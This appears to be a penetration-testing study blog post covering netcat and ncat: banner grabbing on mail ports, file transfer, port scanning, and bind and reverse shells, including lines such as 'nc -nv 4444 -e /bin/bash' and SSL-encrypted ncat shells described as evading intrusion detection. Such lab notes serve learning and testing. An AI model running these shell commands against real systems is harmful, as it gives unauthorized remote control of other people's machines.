Free MP3 Music Header Free MP3 Music Header Free MP3 Music Header
Chrome Strip
Chrome Strip


Banner Grabbing - SMTP:
Let's see if we can get any interesting information from this machine or it's banners. Syntax below is target IP then port number being targeted.
#nc -nv 25

The output of this command shows that the smtp port 25 is open and the smtp banner is displayed:
"220 localhost ESMTP is server is ready."

Since SMTP uses a clear text protocol, we can now interact with this service. Let's try typing HELP.

The server responds and provides the Mail server account name of 'Maiser' along with a list of recognised SMTP commands

Banner Grabbing - POP3:
Lets try connecting to port 110 next - pop3
#nc -nv 110

The output shows that the port is open and we get the pop3 service banner and a prompt to enter pop3 credentials:
"+OK <753110.63@localhost>, POP3 server ready"

We can continue using netcat to interact with the pop3 server.
USER bob
PASS bob
Since we do not have the right username and password combination, the logon attempt fails.

Banner Grabbing - IMAP:
Let's try connecting to the IMAP port. TCP port 143.
#nc -nv 143

The output shows that the port is open and provides the banner. The banner output for imap in this example is more verbose as it provides the version in additional to the program.
"OK localhost IMAP4rev1 Mercury/32 v4.5 server ready"

Transferring a file with Netcat:
Netcat can also be used to transfer both text and binary files from one machine to another.

We will now upload a file to the windows machine from the kali box.

on the windows machine, we will setup a netcat listener as we did earlier although this time we will pipe any input in to a file called incoming.exe

C:\>nc -nvlp 4444 >incoming.exe

So now any incoming data on port 4444 will end up in the file incoming.exe

From the kali machine we will locate the wget.exe file and then upload it over netcat.

#locate wget.exe
#nc -nv 4444
In this case we do not see any feedback from the windows server that the file upload has completed.

in order to verify that the upload did complete, we can test the incoming.exe file on the windows 7 machine and ensure that this file works just like a wget.exe file.
C:\>incoming.exe -h

Netcat Bind Shell:
Bob on windows.
Alice on the kali machine.

Imagine Bob has a public IP address and is connected to the internet.
Alice's computer is located in a corporate network behind a firewall making her machine inaccessible and no routable from the internet.

Bob needs Alice to connect to his computer and take care of it for administration purposes. First Bob will setup up a listener that will allow cmd.exe to be executing, this require -e cmd.exe to be added to the standard nc listener. eg.
c:\>nc -lvp 4444 -e cmd.exe

After Bob has run the above command, anyone connecting to his IP on port 4444 will be prompted with a command prompt on his machine.

Alice now connects:
#nc -nv 4444

Alice now has an interactive windows shell on Bob's Machine.

Netcat Reverse Shell:
This is a more interesting scenario.

Now ALice needs help from Bob. Bob needs to connect to her Linux machine, behind the corporate firewall.
Alice is unable to accept incoming connections from Bob. ALice can make outbound connections which allows her to connect to Bob with a netcat session tied to a local shell. Once this conneciton is made, Bob will have access to her computer and will be able to execute commands.

Bob needs to setup a netcat listener and listen for incoming connections.
C:\> nc -lvp 4444

Alice can connect to Bob's listner
#nc -nv 4444 -e /bin/bash

Once the connection occurs, Bob will be able to execute linux commands in the windows command prompt.
#uname -a

So now we have a bash shell sent from Alice's Linux Machine behind the corporate firewall to Bob's Windows machine.

Completing a 3-way handshake indicates that the port is open in this technique.

eg: A simple Connect Scan between ports 3385 and 3389 on
#nc -nvv -w 1 -z 3385-3395

SYN scanning is also known as half connect or stealth scanning.

Send SYN packets without completing the TCP handshake if the TCP port is open, a SYN/ACK should be sent back from the target machine. There is no need to send back the final ACK.

This used to be able bypass old and primitive firewalls as logging was limited to completed tcp sessions only. This is no longer true and will be detected.

Since The UDP protocol is stateless, it does not require a 3-way handshake. The mechanism behind UDP port scanning is different to TCP.

eg: A UDP scan for the host at and a port range of 160-165.
#nc -unvv -w 1 -z 160-165

In the case that a port is closed, a destination unreachable icmp packet is returned. In the event that a port is open, no response at all is provided. Due to this, UDP scannning is often unreliable as firewalls and routers may drop icmp packets all together leading to false positives in or scans.


One of the drawbacks of using netcat for bind and reverse shells is the fact that it lacks encryption and that there is no way to limit access from incoming connections. Encryption of the bind or reverse shells will assist the pen tester by avoiding detection by Intrusion Detection Systems. Limiting access to the shells will ensure that other machine do not use these exploits.

** When possible tools like "Ncat" and "sbd" should be used instead of netcat.

Ncat has tonnes more features than netcat including ssl encryption and the ability to whitelist access to specific IPs.

NCAT: Bind Shell
Lets use Ncat to create a more secure bind shell between Bob and Alice.

Bob will use Ncat to setup an SSL encrypted bind shell on port 4444 and allow only Alice's IP to connect to it.

First copy ncat to the windows directory so that it is your path.

Bob sets up an ncat listener to allow only Alice's IP and to use ssl encryption.
C:\>ncat -lvp 4444 -e cmd.exe --allow --ssl

Alice now uses ncat to connect to Bob's IP on port 4444 using SSL:
#ncat -v 4444 --ssl

Bob now has an encrypted shell back to Alice's computer. How do we know that our traffic is indeed no longer in clear text? Let's use Wireshark for this.

NCAT: Reverse Shell
I used what I had learned above to create a reverse shell on ssl with restricted access:

On Bob machine, I set up a listener:
C:\>ncat -lvp 4444 --ssl --allow

On Alice's machine I connect to Bob offering a bash shell.
#ncat -nv 4444 -e /bin/bash --ssl